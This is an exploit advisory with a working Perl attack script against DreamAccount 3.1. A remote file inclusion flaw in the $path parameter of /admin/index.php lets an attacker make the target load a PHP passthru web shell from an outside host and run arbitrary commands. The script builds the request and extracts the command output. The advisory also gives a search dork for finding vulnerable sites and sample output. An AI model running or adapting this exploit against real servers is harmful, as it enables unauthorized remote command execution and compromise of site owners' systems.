DREAMACCOUNT V3.1 Remote Command Execution Exploit
----------------------------------------------------
DREAMACCOUNT V3.1 Command Execution Exploit
----------------------------------------------------
Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)
Coded By Drago84(Exclusive Security Team)
----------------------------------------------------
site of script:http://dreamcost.com
----------------------------------------------------
Vulnerable: DREAMACCOUNT V3.1
----------------------------------------------------
vulnerable file :
------------------
/admin/index.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require($path . "setup.php");
require($path . "functions.php");
require($path . "payment_processing.inc.php");
$path parameter File inclusion
----------------------------------------------------
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
print
"\n=============================================================================\r\n";
print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n";
print
"=============================================================================\r\n";
print "[*] dork:\"powered by DreamAccount 3.1\"\n";
print "[*] Coded By : Drago84 \n";
print "[*] Discovered by CrAsH_oVeR_rIdE\n";
print "[*] Use <site> <dir_Dream> <eval site> <cmd>\n";
print " Into the Eval Site it must be:\n\n";
print " Exclusive <?php passthru($_GET[cmd]); ?> /Exclusive";
if (@ARGV < 4)
{
print "\n\n[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>\n";
print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/
http://www.site.org/doc.jpg id\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}
my $dir=$ARGV[1];
my $host=$ARGV[0];
my $eval=$ARGV[2];
my $cmd=$ARGV[3];
my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;
print "\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
print "\n\nResult of:".$cmd."\n";
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );
printf $1;
$response->content;
print "\n";
}
----------------------------------------------------------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Coded By Drago84
E-mail:KARKOR23@xxxxxxxxxxx
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER
,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR
AND ALL LEZR.COM Member